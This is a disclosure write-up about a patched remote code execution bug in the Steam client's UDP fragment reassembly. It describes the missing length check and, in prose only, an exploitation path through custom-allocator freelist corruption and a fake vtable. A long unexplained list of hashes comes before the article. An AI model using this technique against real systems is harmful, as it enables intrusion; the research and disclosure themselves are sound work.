  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.


At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details



The Steam protocol has been reverse engineered and well documented by others (e.g. from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll


The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.


The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4


This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.


In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.


For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.


When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.


When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.


The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.


The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.


Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.


Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.


If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team ( at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at